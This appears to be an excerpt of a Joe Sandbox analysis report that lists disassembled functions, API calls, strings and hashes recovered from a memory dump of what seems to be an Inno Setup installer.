Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseErrorFindLast
String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
API String ID: 754982922-1448842058
Opcode ID: 57e0c8ccebeb7184da741e20b7d6bda7044560dbf179fd464141c630ba455fd8
Instruction ID: 65fff70db6fa7d9e45c4e30736062023b7b7828f3df3317cc7ecb80ce87614ba
Opcode Fuzzy Hash: 57e0c8ccebeb7184da741e20b7d6bda7044560dbf179fd464141c630ba455fd8
Instruction Fuzzy Hash: 7841A330A04209DBCB11DB6AC8013AE76A55F49306F55857FAC0197393DB7C8E0D876E

Function 00422E60 Relevance: 12.1, APIs: 8, Instructions: 119windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 00422EB4
GetCapture.USER32 ref: 00422EC3
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
ReleaseCapture.USER32 ref: 00422ECE
GetActiveWindow.USER32 ref: 00422EDD
SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
GetActiveWindow.USER32 ref: 00422FCF

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: 0c435bf511bce9c0c4602d4c311bc19cd41662654068aa8a958521a418b0f2a9
Instruction ID: db8aa600a50c93bece591f99e5806f4c3f5e9428d1b568cd9ed9aa9c7d903083
Opcode Fuzzy Hash: 0c435bf511bce9c0c4602d4c311bc19cd41662654068aa8a958521a418b0f2a9
Instruction Fuzzy Hash: 0A413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF540AB392DB789E40DB5D

Function 0042F104 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 0042F12E
GetWindowLongA.USER32(?,000000EC), ref: 0042F145
GetActiveWindow.USER32 ref: 0042F14E
MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F17B
SetActiveWindow.USER32(?,0042F2AB,00000000,?), ref: 0042F19C

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Window$ActiveLong$Message
String ID:
API String ID: 2785966331-0
Opcode ID: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
Instruction ID: 66ba457b2775015b13cc3341b2fd0efd1cc0de66d5492798f2afbbc1fd9aa33e
Opcode Fuzzy Hash: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
Instruction Fuzzy Hash: 7B31B474A00654EFDB01EFB6DC52D6EBBB8EB09714F9144BAF804E3291D6399D10CB68

Function 00429490 Relevance: 12.1, APIs: 8, Instructions: 62COMMON

Download Yara Rule

APIs

73A1A570.USER32(00000000), ref: 0042949A
GetTextMetricsA.GDI32(00000000), ref: 004294A3

Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7

SelectObject.GDI32(00000000,00000000), ref: 004294B2
GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
SelectObject.GDI32(00000000,00000000), ref: 004294C6
73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
GetSystemMetrics.USER32(00000006), ref: 004294F3
GetSystemMetrics.USER32(00000006), ref: 0042950D

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
String ID:
API String ID: 361401722-0
Opcode ID: ddddefcdf100d818f5398c04065f48e60301a070589a14b18048d2092dd0edfb
Instruction ID: 4657f5dde1e086c017b18360b1712f1689f4efb7679c0f09225e2053bbf18421
Opcode Fuzzy Hash: ddddefcdf100d818f5398c04065f48e60301a070589a14b18048d2092dd0edfb
Instruction Fuzzy Hash: F701E1917087513BFB11B67A9CC2F6B61D8CB84358F44043FFA459A3D2D96C9C80866A

Function 0041DE34 Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON

Download Yara Rule

APIs

73A1A570.USER32(00000000,?,00419069,004970A2), ref: 0041DE37
73A24620.GDI32(00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE41
73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE4E
MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
GetStockObject.GDI32(00000007), ref: 0041DE6B
GetStockObject.GDI32(00000005), ref: 0041DE77
GetStockObject.GDI32(0000000D), ref: 0041DE83
LoadIconA.USER32(00000000,00007F00), ref: 0041DE94

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ObjectStock$A24620A480A570IconLoad
String ID:
API String ID: 3573811560-0
Opcode ID: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
Instruction ID: b4cf756beaef1adc4f5fbcf44fabff1cc3cb88bfcb9329de381bdc5a6adb432b
Opcode Fuzzy Hash: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
Instruction Fuzzy Hash: 88113DB06443015EE740FF665896BAA3690DB24708F04813FF645AF2D2DB7D1CA49BAE

Function 00462968 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273COMMON

Download Yara Rule

APIs

LoadCursorA.USER32(00000000,00007F02), ref: 00462A6C
SetCursor.USER32(00000000,00000000,00007F02,00000000,00462B01), ref: 00462A72
SetCursor.USER32(?,00462AE9,00007F02,00000000,00462B01), ref: 00462ADC

Strings

, xrefs: 00462CE7
, xrefs: 00462D02
Internal error: Item already expanding, xrefs: 00462A09

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Cursor$Load
String ID: $ $Internal error: Item already expanding
API String ID: 1675784387-1948079669
Opcode ID: ad683674f4580f1e1aa17f5a9c1d46edd0719ef7fbd07970485d4df48dda1b37
Instruction ID: 09c47418b275a9072aadbefc454c559749aab815838d7f365e24efc4a4a37fb5
Opcode Fuzzy Hash: ad683674f4580f1e1aa17f5a9c1d46edd0719ef7fbd07970485d4df48dda1b37
Instruction Fuzzy Hash: 0DB1A530600A04EFD720DF69D685B9ABBF1FF44304F1484AAE8459B7A2D7B8ED45CB19

Function 004756FC Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 200windowCOMMON

Download Yara Rule

APIs

GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00475755
73A259E0.USER32(00000000,000000FC,004756B0,00000000,00475994,?,00000000,004759BE), ref: 0047577C
GetACP.KERNEL32(00000000,00475994,?,00000000,004759BE), ref: 004757B9
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004757FF

Strings

COMBOBOX, xrefs: 0047574E
Inno Setup: Language, xrefs: 00475887

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: A259ClassInfoMessageSend
String ID: COMBOBOX$Inno Setup: Language
API String ID: 3217714596-4234151509
Opcode ID: 1ccc6747c3039ead22a329b7f78916889190244fc8c6905f913f87e2f769e72b
Instruction ID: 765adbbab907e06bc7bf6e6f7cf1d32fb8b56d6e7c29df1de031be62d4a3d325
Opcode Fuzzy Hash: 1ccc6747c3039ead22a329b7f78916889190244fc8c6905f913f87e2f769e72b
Instruction Fuzzy Hash: F7815E70A00605DFC710EF69D885A9EB7F5FB09314F1581BAE808EB362D774AD41CB99

Function 00408728 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742

Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E

Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF

Strings

m/d/yy, xrefs: 00408811
:mm, xrefs: 00408924
mmmm d, yyyy, xrefs: 00408833
:mm:ss, xrefs: 0040893E
AMPM, xrefs: 0040890D

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: InfoLocale$DefaultSystem
String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
API String ID: 1044490935-665933166
Opcode ID: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
Instruction ID: 5b8a50df068a6b2da3a3ead13541c1976fd8fe610af15afaced6bb711b513b54
Opcode Fuzzy Hash: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
Instruction Fuzzy Hash: 35513024B00108ABD701FBA69D41A9E77A9DB94304F50C07FA441BB3C6DE3DDE15875E

Function 00411704 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158windowCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A

Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6

InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6

Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0

InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD

Strings

,, xrefs: 004117AF
?, xrefs: 004117B6

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Menu$Insert$Create$ItemPopupVersion
String ID: ,$?
API String ID: 2359071979-2308483597
Opcode ID: 57ccdcba8889ff27764a16026ea30ef1297fbdf3a800011468703812a277a737
Instruction ID: bc3149483dfa03cdc0807f0a56c3f90cc05caec19bb46b1e0c32919a2f580dbf
Opcode Fuzzy Hash: 57ccdcba8889ff27764a16026ea30ef1297fbdf3a800011468703812a277a737
Instruction Fuzzy Hash: 95512674A00144ABDB00EF6ADC816EA7BF9AF09304B11817BFA04E73A6D738C941CB5C

Function 0041BE73 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
DeleteObject.GDI32(?), ref: 0041BFAF
DeleteObject.GDI32(?), ref: 0041BFB8
CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Object$BitmapBitsDelete$CreateIcon
String ID:
API String ID: 1030595962-0
Opcode ID: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
Instruction ID: b628a60b6e344882d317dd96d191c0cb792f95d1e2fbfe9e34044ce63643746d
Opcode Fuzzy Hash: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
Instruction Fuzzy Hash: 48510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64

Function 0041CEE8 Relevance: 10.7, APIs: 7, Instructions: 152windowCOMMON

Download Yara Rule

APIs

SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
73A24620.GDI32(00000000,00000026), ref: 0041CF2D
73A18830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
73A122A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
73A18830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Stretch$A18830$A122A24620BitsMode
String ID:
API String ID: 430401518-0
Opcode ID: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
Opcode Fuzzy Hash: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58

Function 004564D4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,?,?), ref: 00456526

Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC

Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
Part of subcall function 0041EEB4: 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09

Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0045658D
TranslateMessage.USER32(?), ref: 004565AB
DispatchMessageA.USER32(?), ref: 004565B4

Strings

[Paused] , xrefs: 0045655C

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Message$TextWindow$A25940CurrentDispatchSendThreadTranslate
String ID: [Paused]
API String ID: 3047529653-4230553315
Opcode ID: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
Instruction ID: b21e1f9e90a9f2d36a55999f4aec8319d50e535270b7c0faa20aeab8e88a7384
Opcode Fuzzy Hash: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
Instruction Fuzzy Hash: 9B310B70904248AEDB01DBB5DC41BCE7BB8EB0D314F95407BF800E3296D67C9909CBA9

Function 0046A628 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99sleepCOMMON

Download Yara Rule

APIs

GetCursor.USER32(00000000,0046A767), ref: 0046A6E4
LoadCursorA.USER32(00000000,00007F02), ref: 0046A6F2
SetCursor.USER32(00000000,00000000,00007F02,00000000,0046A767), ref: 0046A6F8
Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A702
SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A708

Strings

CheckPassword, xrefs: 0046A68C

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Cursor$LoadSleep
String ID: CheckPassword
API String ID: 4023313301-1302249611
Opcode ID: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
Instruction ID: 8e453c91c0c590c9759b614a584e43fa839bbbc5a3d1c7197c153ffb71e3d1f4
Opcode Fuzzy Hash: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
Instruction Fuzzy Hash: 36319334640604AFD711EB69C989F9E7BE0EF05305F5580B6F844AB3A2D778EE00CB5A

Function 00476714 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0047663C: GetWindowThreadProcessId.USER32(00000000), ref: 00476644
Part of subcall function 0047663C: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
Part of subcall function 0047663C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D

SendMessageA.USER32(00000000,0000004A,00000000,00476ACE), ref: 00476749
GetTickCount.KERNEL32 ref: 0047678E
GetTickCount.KERNEL32 ref: 00476798
MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004767ED

Strings

CallSpawnServer: Unexpected response: $%x, xrefs: 0047677E
CallSpawnServer: Unexpected status: %d, xrefs: 004767D6

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
API String ID: 613034392-3771334282
Opcode ID: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
Instruction ID: 71a83a78c23d55d33e7515897efa00ecebce1ccd6bd4cc0fbedfc923aec738ff
Opcode Fuzzy Hash: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
Instruction Fuzzy Hash: 7831C074F006149ADB10EBB9C8827EEB3E29F04304F91843BB548EB382D67C8D018B9D

Function 00458EA4 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00458F5F

Strings

Fusion.dll, xrefs: 00458EFF
.NET Framework CreateAssemblyCache function failed, xrefs: 00458F82
CreateAssemblyCache, xrefs: 00458F56
Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00458F6A
Failed to load .NET Framework DLL "%s", xrefs: 00458F44

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressProc
String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
API String ID: 190572456-3990135632
Opcode ID: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
Instruction ID: b0fae5d47ad60a87b9f111cdb81e12311f6487f55351a3ce1c195c50c1487ae5
Opcode Fuzzy Hash: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
Instruction Fuzzy Hash: 31317971E00605ABCB00DFA5C88169EB7B5AF48315F50857FE814F7382DF7899098799

Function 0041C158 Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065

GetFocus.USER32 ref: 0041C178
73A1A570.USER32(?), ref: 0041C184
73A18830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
73A122A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
73A18830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
73A1A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

